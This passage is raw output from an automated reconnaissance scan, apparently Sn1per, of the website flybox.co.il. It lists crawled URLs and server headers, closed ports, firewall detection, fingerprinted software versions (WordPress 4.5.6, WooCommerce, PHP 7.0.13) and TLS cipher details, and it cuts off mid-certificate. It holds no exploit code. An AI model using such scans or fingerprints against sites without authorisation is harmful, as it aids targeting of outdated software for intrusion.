  2344. |_[ + ] Found:: UNIDENTIFIED
  2345. 
  2346.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2347. |_[ + ] [ 57 / 100 ]-[05:19:19] [ - ] 
  2348. |_[ + ] Target:: [ https://www.flybox.co.il/ךישום-לניוזלט׹/ ]
  2349. |_[ + ] Exploit:: 
  2350. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2351. |_[ + ] More details:: 
  2352. |_[ + ] Found:: UNIDENTIFIED
  2353. 
  2354.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2355. |_[ + ] [ 58 / 100 ]-[05:19:20] [ - ] 
  2356. |_[ + ] Target:: [ https://www.flybox.co.il/en/packages/ ]
  2357. |_[ + ] Exploit:: 
  2358. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2359. |_[ + ] More details:: 
  2360. |_[ + ] Found:: UNIDENTIFIED
  2361. 
  2362.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2363. |_[ + ] [ 59 / 100 ]-[05:19:21] [ - ] 
  2364. |_[ + ] Target:: [ https://www.flybox.co.il/test-popup/ ]
  2365. |_[ + ] Exploit:: 
  2366. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2367. |_[ + ] More details:: 
  2368. |_[ + ] Found:: UNIDENTIFIED
  2369. 
  2370.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2371. |_[ + ] [ 60 / 100 ]-[05:19:21] [ - ] 
  2372. |_[ + ] Target:: [ https://www.flybox.co.il/en/personal_details_coupon/ ]
  2373. |_[ + ] Exploit:: 
  2374. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: cloudflare , IP:2400:cb00:2048:1::681f:4bef:443 
  2375. |_[ + ] More details:: 
  2376. |_[ + ] Found:: UNIDENTIFIED
  2377. 
  2378.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2379. |_[ + ] [ 61 / 100 ]-[05:19:22] [ - ] 
  2380. |_[ + ] Target:: [ https://www.flybox.co.il/שובךים-2/ ]
  2381. |_[ + ] Exploit:: 
  2382. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2383. |_[ + ] More details:: 
  2384. |_[ + ] Found:: UNIDENTIFIED
  2385. 
  2386.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2387. |_[ + ] [ 62 / 100 ]-[05:19:23] [ - ] 
  2388. |_[ + ] Target:: [ https://www.flybox.co.il/en/שובךים/ ]
  2389. |_[ + ] Exploit:: 
  2390. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2391. |_[ + ] More details:: 
  2392. |_[ + ] Found:: UNIDENTIFIED
  2393. 
  2394.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2395. |_[ + ] [ 63 / 100 ]-[05:19:25] [ - ] 
  2396. |_[ + ] Target:: [ https://www.flybox.co.il/en/unsubsribe/ ]
  2397. |_[ + ] Exploit:: 
  2398. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2399. |_[ + ] More details:: 
  2400. |_[ + ] Found:: UNIDENTIFIED
  2401. 
  2402.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2403. |_[ + ] [ 64 / 100 ]-[05:19:26] [ - ] 
  2404. |_[ + ] Target:: [ https://www.flybox.co.il/custom-packages/ ]
  2405. |_[ + ] Exploit:: 
  2406. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2407. |_[ + ] More details:: 
  2408. |_[ + ] Found:: UNIDENTIFIED
  2409. 
  2410.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2411. |_[ + ] [ 65 / 100 ]-[05:19:26] [ - ] 
  2412. |_[ + ] Target:: [ https://www.flybox.co.il/gallery-press/ ]
  2413. |_[ + ] Exploit:: 
  2414. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2415. |_[ + ] More details:: 
  2416. |_[ + ] Found:: UNIDENTIFIED
  2417. 
  2418.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2419. |_[ + ] [ 66 / 100 ]-[05:19:27] [ - ] 
  2420. |_[ + ] Target:: [ https://www.flybox.co.il/en/forgot/ ]
  2421. |_[ + ] Exploit:: 
  2422. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2423. |_[ + ] More details:: 
  2424. |_[ + ] Found:: UNIDENTIFIED
  2425. 
  2426.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2427. |_[ + ] [ 67 / 100 ]-[05:19:28] [ - ] 
  2428. |_[ + ] Target:: [ https://www.flybox.co.il/category/news/ ]
  2429. |_[ + ] Exploit:: 
  2430. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2431. |_[ + ] More details:: 
  2432. |_[ + ] Found:: UNIDENTIFIED
  2433. 
  2434.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2435. |_[ + ] [ 68 / 100 ]-[05:19:28] [ - ] 
  2436. |_[ + ] Target:: [ https://www.flybox.co.il/choose-package/ ]
  2437. |_[ + ] Exploit:: 
  2438. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2439. |_[ + ] More details:: 
  2440. |_[ + ] Found:: UNIDENTIFIED
  2441. 
  2442.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2443. |_[ + ] [ 69 / 100 ]-[05:19:29] [ - ] 
  2444. |_[ + ] Target:: [ https://www.flybox.co.il/en/blackfriday/ ]
  2445. |_[ + ] Exploit:: 
  2446. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2447. |_[ + ] More details:: 
  2448. |_[ + ] Found:: UNIDENTIFIED
  2449. 
  2450.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2451. |_[ + ] [ 70 / 100 ]-[05:19:29] [ - ] 
  2452. |_[ + ] Target:: [ https://www.flybox.co.il/contact-test/ ]
  2453. |_[ + ] Exploit:: 
  2454. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2455. |_[ + ] More details:: 
  2456. |_[ + ] Found:: UNIDENTIFIED
  2457. 
  2458.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2459. |_[ + ] [ 71 / 100 ]-[05:19:30] [ - ] 
  2460. |_[ + ] Target:: [ https://www.flybox.co.il/en/מה-היא-מנהךת-׹וח/ ]
  2461. |_[ + ] Exploit:: 
  2462. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2463. |_[ + ] More details:: 
  2464. |_[ + ] Found:: UNIDENTIFIED
  2465. 
  2466.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2467. |_[ + ] [ 72 / 100 ]-[05:19:32] [ - ] 
  2468. |_[ + ] Target:: [ https://www.flybox.co.il/en/upsells/ ]
  2469. |_[ + ] Exploit:: 
  2470. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2471. |_[ + ] More details:: 
  2472. |_[ + ] Found:: UNIDENTIFIED
  2473. 
  2474.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2475. |_[ + ] [ 73 / 100 ]-[05:19:33] [ - ] 
  2476. |_[ + ] Target:: [ https://www.flybox.co.il/2016/12/04/אט׹קשיה-במ׹כז/ ]
  2477. |_[ + ] Exploit:: 
  2478. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2479. |_[ + ] More details:: 
  2480. |_[ + ] Found:: UNIDENTIFIED
  2481. 
  2482.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2483. |_[ + ] [ 74 / 100 ]-[05:19:33] [ - ] 
  2484. |_[ + ] Target:: [ https://www.flybox.co.il/applied-coupon/ ]
  2485. |_[ + ] Exploit:: 
  2486. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2487. |_[ + ] More details:: 
  2488. |_[ + ] Found:: UNIDENTIFIED
  2489. 
  2490.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2491. |_[ + ] [ 75 / 100 ]-[05:19:33] [ - ] 
  2492. |_[ + ] Target:: [ https://www.flybox.co.il/2016/11/25/אט׹קשיה-לכל-המש׀חה/ ]
  2493. |_[ + ] Exploit:: 
  2494. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2495. |_[ + ] More details:: 
  2496. |_[ + ] Found:: UNIDENTIFIED
  2497. 
  2498.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2499. |_[ + ] [ 76 / 100 ]-[05:19:34] [ - ] 
  2500. |_[ + ] Target:: [ https://www.flybox.co.il/2016/12/12/אטךק׊יות-לב׹-משווה/ ]
  2501. |_[ + ] Exploit:: 
  2502. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2503. |_[ + ] More details:: 
  2504. |_[ + ] Found:: UNIDENTIFIED
  2505. 
  2506.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2507. |_[ + ] [ 77 / 100 ]-[05:19:35] [ - ] 
  2508. |_[ + ] Target:: [ https://www.flybox.co.il/en/2016/12/04/אט׹קשיה-במ׹כז/ ]
  2509. |_[ + ] Exploit:: 
  2510. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2511. |_[ + ] More details:: 
  2512. |_[ + ] Found:: UNIDENTIFIED
  2513. 
  2514.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2515. |_[ + ] [ 78 / 100 ]-[05:19:35] [ - ] 
  2516. |_[ + ] Target:: [ https://www.flybox.co.il/en/test-popup/ ]
  2517. |_[ + ] Exploit:: 
  2518. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: cloudflare , IP:2400:cb00:2048:1::681f:4bef:443 
  2519. |_[ + ] More details:: 
  2520. |_[ + ] Found:: UNIDENTIFIED
  2521. 
  2522.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2523. |_[ + ] [ 79 / 100 ]-[05:19:36] [ - ] 
  2524. |_[ + ] Target:: [ https://www.flybox.co.il/tag/יום-גיבוש/ ]
  2525. |_[ + ] Exploit:: 
  2526. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2527. |_[ + ] More details:: 
  2528. |_[ + ] Found:: UNIDENTIFIED
  2529. 
  2530.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2531. |_[ + ] [ 80 / 100 ]-[05:19:37] [ - ] 
  2532. |_[ + ] Target:: [ https://www.flybox.co.il/en/gallery-photos/ ]
  2533. |_[ + ] Exploit:: 
  2534. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2535. |_[ + ] More details:: 
  2536. |_[ + ] Found:: UNIDENTIFIED
  2537. 
  2538.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2539. |_[ + ] [ 81 / 100 ]-[05:19:37] [ - ] 
  2540. |_[ + ] Target:: [ https://www.flybox.co.il/חולמים-לעוף-שוב/ ]
  2541. |_[ + ] Exploit:: 
  2542. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2543. |_[ + ] More details:: 
  2544. |_[ + ] Found:: UNIDENTIFIED
  2545. 
  2546.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2547. |_[ + ] [ 82 / 100 ]-[05:19:37] [ - ] 
  2548. |_[ + ] Target:: [ https://www.flybox.co.il/apply-gift-voucher/ ]
  2549. |_[ + ] Exploit:: 
  2550. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2551. |_[ + ] More details:: 
  2552. |_[ + ] Found:: UNIDENTIFIED
  2553. 
  2554.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2555. |_[ + ] [ 83 / 100 ]-[05:19:38] [ - ] 
  2556. |_[ + ] Target:: [ https://www.flybox.co.il/en/gallery-videos/ ]
  2557. |_[ + ] Exploit:: 
  2558. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2559. |_[ + ] More details:: 
  2560. |_[ + ] Found:: UNIDENTIFIED
  2561. 
  2562.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2563. |_[ + ] [ 84 / 100 ]-[05:19:40] [ - ] 
  2564. |_[ + ] Target:: [ https://www.flybox.co.il/en/שובךים-2/ ]
  2565. |_[ + ] Exploit:: 
  2566. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2567. |_[ + ] More details:: 
  2568. |_[ + ] Found:: UNIDENTIFIED
  2569. 
  2570.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2571. |_[ + ] [ 85 / 100 ]-[05:19:40] [ - ] 
  2572. |_[ + ] Target:: [ https://www.flybox.co.il/tag/מתנה-מקוךית/ ]
  2573. |_[ + ] Exploit:: 
  2574. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2575. |_[ + ] More details:: 
  2576. |_[ + ] Found:: UNIDENTIFIED
  2577. 
  2578.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2579. |_[ + ] [ 86 / 100 ]-[05:19:41] [ - ] 
  2580. |_[ + ] Target:: [ https://www.flybox.co.il/en/gallery-press/ ]
  2581. |_[ + ] Exploit:: 
  2582. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2583. |_[ + ] More details:: 
  2584. |_[ + ] Found:: UNIDENTIFIED
  2585. 
  2586.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2587. |_[ + ] [ 87 / 100 ]-[05:19:42] [ - ] 
  2588. |_[ + ] Target:: [ https://www.flybox.co.il/tag/ילדים-במ׹כז/ ]
  2589. |_[ + ] Exploit:: 
  2590. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2591. |_[ + ] More details:: 
  2592. |_[ + ] Found:: UNIDENTIFIED
  2593. 
  2594.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2595. |_[ + ] [ 88 / 100 ]-[05:19:43] [ - ] 
  2596. |_[ + ] Target:: [ https://www.flybox.co.il/en/custom-packages/ ]
  2597. |_[ + ] Exploit:: 
  2598. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2599. |_[ + ] More details:: 
  2600. |_[ + ] Found:: UNIDENTIFIED
  2601. 
  2602.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2603. |_[ + ] [ 89 / 100 ]-[05:19:44] [ - ] 
  2604. |_[ + ] Target:: [ https://www.flybox.co.il/tag/איךוע-חב׹ה/ ]
  2605. |_[ + ] Exploit:: 
  2606. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2607. |_[ + ] More details:: 
  2608. |_[ + ] Found:: UNIDENTIFIED
  2609. 
  2610.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2611. |_[ + ] [ 90 / 100 ]-[05:19:44] [ - ] 
  2612. |_[ + ] Target:: [ https://www.flybox.co.il/test-custom-packages/ ]
  2613. |_[ + ] Exploit:: 
  2614. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2615. |_[ + ] More details:: 
  2616. |_[ + ] Found:: UNIDENTIFIED
  2617. 
  2618.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2619. |_[ + ] [ 91 / 100 ]-[05:19:44] [ - ] 
  2620. |_[ + ] Target:: [ https://www.flybox.co.il/תקנון-עמוד-תשלום/ ]
  2621. |_[ + ] Exploit:: 
  2622. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2623. |_[ + ] More details:: 
  2624. |_[ + ] Found:: UNIDENTIFIED
  2625. 
  2626.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2627. |_[ + ] [ 92 / 100 ]-[05:19:45] [ - ] 
  2628. |_[ + ] Target:: [ https://www.flybox.co.il/en/category/news/ ]
  2629. |_[ + ] Exploit:: 
  2630. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2631. |_[ + ] More details:: 
  2632. |_[ + ] Found:: UNIDENTIFIED
  2633. 
  2634.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2635. |_[ + ] [ 93 / 100 ]-[05:19:46] [ - ] 
  2636. |_[ + ] Target:: [ https://www.flybox.co.il/tag/חוויה-לילדים/ ]
  2637. |_[ + ] Exploit:: 
  2638. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: cloudflare , IP:2400:cb00:2048:1::681f:4bef:443 
  2639. |_[ + ] More details:: 
  2640. |_[ + ] Found:: UNIDENTIFIED
  2641. 
  2642.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2643. |_[ + ] [ 94 / 100 ]-[05:19:46] [ - ] 
  2644. |_[ + ] Target:: [ https://www.flybox.co.il/ע׀ים-ב׀עם-הךאשונה/ ]
  2645. |_[ + ] Exploit:: 
  2646. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: cloudflare , IP:2400:cb00:2048:1::681f:4bef:443 
  2647. |_[ + ] More details:: 
  2648. |_[ + ] Found:: UNIDENTIFIED
  2649. 
  2650.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2651. |_[ + ] [ 95 / 100 ]-[05:19:46] [ - ] 
  2652. |_[ + ] Target:: [ https://www.flybox.co.il/en/selected-package/ ]
  2653. |_[ + ] Exploit:: 
  2654. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: cloudflare , IP:2400:cb00:2048:1::681f:4bef:443 
  2655. |_[ + ] More details:: 
  2656. |_[ + ] Found:: UNIDENTIFIED
  2657. 
  2658.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2659. |_[ + ] [ 96 / 100 ]-[05:19:47] [ - ] 
  2660. |_[ + ] Target:: [ https://www.flybox.co.il/en/contact-test/ ]
  2661. |_[ + ] Exploit:: 
  2662. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2663. |_[ + ] More details:: 
  2664. |_[ + ] Found:: UNIDENTIFIED
  2665. 
  2666.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2667. |_[ + ] [ 97 / 100 ]-[05:19:48] [ - ] 
  2668. |_[ + ] Target:: [ https://www.flybox.co.il/en/choose-package/ ]
  2669. |_[ + ] Exploit:: 
  2670. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2671. |_[ + ] More details:: 
  2672. |_[ + ] Found:: UNIDENTIFIED
  2673. 
  2674.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2675. |_[ + ] [ 98 / 100 ]-[05:19:50] [ - ] 
  2676. |_[ + ] Target:: [ https://www.flybox.co.il/en/ךישום-לניוזלט׹/ ]
  2677. |_[ + ] Exploit:: 
  2678. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2679. |_[ + ] More details:: 
  2680. |_[ + ] Found:: UNIDENTIFIED
  2681. 
  2682.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2683. |_[ + ] [ 99 / 100 ]-[05:19:50] [ - ] 
  2684. |_[ + ] Target:: [ https://www.flybox.co.il/en/2016/11/25/אט׹קשיה-לכל-המש׀חה/ ]
  2685. |_[ + ] Exploit:: 
  2686. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2687. |_[ + ] More details:: 
  2688. |_[ + ] Found:: UNIDENTIFIED
  2689.  
  2690. [ INFO ] [ Shutting down ]
  2691. [ INFO ] [ End of process INURLBR at [31-12-2017 05:19:50]
  2692. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  2693. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-flybox.co.il.txt ]
  2694. |_________________________________________________________________________________________
  2695.  
  2696. \_________________________________________________________________________________________/
  2697.  
  2698.  + -- --=[Port 110 closed... skipping.
  2699.  + -- --=[Port 111 closed... skipping.
  2700.  + -- --=[Port 135 closed... skipping.
  2701.  + -- --=[Port 139 closed... skipping.
  2702.  + -- --=[Port 161 closed... skipping.
  2703.  + -- --=[Port 162 closed... skipping.
  2704.  + -- --=[Port 389 closed... skipping.
  2705.  + -- --=[Port 443 opened... running tests...
  2706.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  2707.  
  2708. ^ ^
  2709. _ __ _ ____ _ __ _ _ ____
  2710. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  2711. | V V // o // _/ | V V // 0 // 0 // _/
  2712. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  2713. <
  2714. ...'
  2715.  
  2716. WAFW00F - Web Application Firewall Detection Tool
  2717.  
  2718. By Sandro Gauci && Wendel G. Henrique
  2719.  
  2720. Checking https://flybox.co.il
  2721. The site https://flybox.co.il is behind a CloudFlare
  2722. Number of requests: 1
  2723.  
  2724.  + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +
  2725.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  2726. https://flybox.co.il [301 Moved Permanently] CloudFlare, Cookies[PHPSESSID,__cfduid,qtrans_front_language], Country[UNITED STATES][US], HTTPServer[cloudflare], HttpOnly[__cfduid], IP[104.31.74.239], PHP[7.0.13], RedirectLocation[https://www.flybox.co.il/], UncommonHeaders[cf-ray], X-Powered-By[PHP/7.0.13]
  2727. https://www.flybox.co.il/ [200 OK] CloudFlare, Cookies[PHPSESSID,__cfduid,qtrans_front_language], Country[UNITED STATES][US], Frame, Google-Analytics[Universal][UA-87930745-1], HTML5, HTTPServer[cloudflare], HttpOnly[__cfduid], IP[104.31.74.239], JQuery[1.0.5,2.1.3], MetaGenerator[WooCommerce 2.5.5,WordPress 4.5.6,qTranslate-X 3.4.6.8], Open-Graph-Protocol[website], PHP[7.0.13], Script[application/ld+json,text/javascript], Title[Flybox - אט׹קשיה במ׹כז לכל המש׀חה והחב׹ים! מנהךת ׹וח הגיעה לישךאל], UncommonHeaders[link,access-control-allow-origin,cf-ray], Vimeo, WordPress[4.5.6], X-Powered-By[PHP/7.0.13], X-UA-Compatible[IE=edge]
  2728.  
  2729.  + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
  2730. Version: 1.11.10-static
  2731. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  2732. 
  2733. Testing SSL server flybox.co.il on port 443 using SNI name flybox.co.il
  2734.  
  2735. TLS Fallback SCSV:
  2736. Server does not support TLS Fallback SCSV
  2737.  
  2738. TLS renegotiation:
  2739. Secure session renegotiation supported
  2740.  
  2741. TLS Compression:
  2742. Compression disabled
  2743.  
  2744. Heartbleed:
  2745. TLS 1.2 not vulnerable to heartbleed
  2746. TLS 1.1 not vulnerable to heartbleed
  2747. TLS 1.0 not vulnerable to heartbleed
  2748.  
  2749. Supported Server Cipher(s):
  2750. Preferred TLSv1.2 256 bits ECDHE-ECDSA-CHACHA20-POLY1305 Curve P-256 DHE 256
  2751. Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  2752. Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
  2753. Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA256 Curve P-256 DHE 256
  2754. Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  2755. Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
  2756. Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA384 Curve P-256 DHE 256
  2757. Preferred TLSv1.1 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
  2758. Accepted TLSv1.1 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
  2759. Preferred TLSv1.0 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
  2760. Accepted TLSv1.0 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
  2761.  
  2762. SSL Certificate:
  2763. Signature Algorithm: ecdsa-with-SHA256
  2764. Subject: sni165065.cloudflaressl.com
  2765. Altnames: DNS:sni165065.cloudflaressl.com, DNS:*.aonlineorder.tk, DNS:*.bestproductthisyear.tk, DNS:*.bigsale135store.tk, DNS:*.bigsale171store.tk, DNS:*.bigsale215store.tk, DNS:*.bigsale248store.tk, DNS:*.bigsale281store.tk, DNS:*.bjfhiu.tk, DNS:*.bsmartbuyer.tk, DNS:*.bsmartonlineshop.tk, DNS:*.btokoonlinemurah.tk, DNS:*.budgettrouwfilm.nl, DNS:*.dbranded.tk, DNS:*.eawesomemarket.tk, DNS:*.emmom.tk, DNS:*.flybox.co.il, DNS:*.fmarketplus.tk, DNS:*.ftopbuy.tk, DNS:*.h1xv9oacp.ga, DNS:*.ialliexpress.tk, DNS:*.iowist.com, DNS:*.ipaytoko.tk, DNS:*.iperfectmarket.tk, DNS:*.ismartxpress.tk, DNS:*.jsmartonlineshop.tk, DNS:*.jtopcharts.tk, DNS:*.lalliexpress.tk, DNS:*.lpayperclick.tk, DNS:*.lpremiumonlineshop.tk, DNS:*.onlinekanyakumari.com, DNS:*.osmartbuyer.tk, DNS:*.pawesomemarket.tk, DNS:*.pbelimudah.tk, DNS:*.rlinkaliexpress.tk, DNS:*.rnesaliexpress.tk, DNS:*.samriddle.website, DNS:*.snapcracka.us, DNS:*.stokoonlinemurah.tk, DNS:*.taeaj.tk, DNS:*.techxpertsllc.com, DNS:*.vbrs.co.uk, DNS:*.wholesaleonline114.tk, DNS:*.wholesaleonline4.tk, DNS:*.wholesaleonline55.tk, DNS:*.wittcatt.stream, DNS:aonlineorder.tk, DNS:bestproductthisyear.tk, DNS:bigsale135store.tk, DNS:bigsale171store.tk, DNS:bigsale215store.tk, DNS:bigsale248store.tk, DNS:bigsale281store.tk, DNS:bjfhiu.tk, DNS:bsmartbuyer.tk, DNS:bsmartonlineshop.tk, DNS:btokoonlinemurah.tk, DNS:budgettrouwfilm.nl, DNS:dbranded.tk, DNS:eawesomemarket.tk, DNS:emmom.tk, DNS:flybox.co.il, DNS:fmarketplus.tk, DNS:ftopbuy.tk, DNS:h1xv9oacp.ga, DNS:ialliexpress.tk, DNS:iowist.com, DNS:ipaytoko.tk, DNS:iperfectmarket.tk, DNS:ismartxpress.tk, DNS:jsmartonlineshop.tk, DNS:jtopcharts.tk, DNS:lalliexpress.tk, DNS:lpayperclick.tk, DNS:lpremiumonlineshop.tk, DNS:onlinekanyakumari.com, DNS:osmartbuyer.tk, DNS:pawesomemarket.tk, DNS:pbelimudah.tk, DNS:rlinkaliexpress.tk, DNS:rnesaliexpress.tk, DNS:samriddle.website, DNS:snapcracka.us, DNS:stokoonlinemurah.tk, DNS:taeaj.tk, 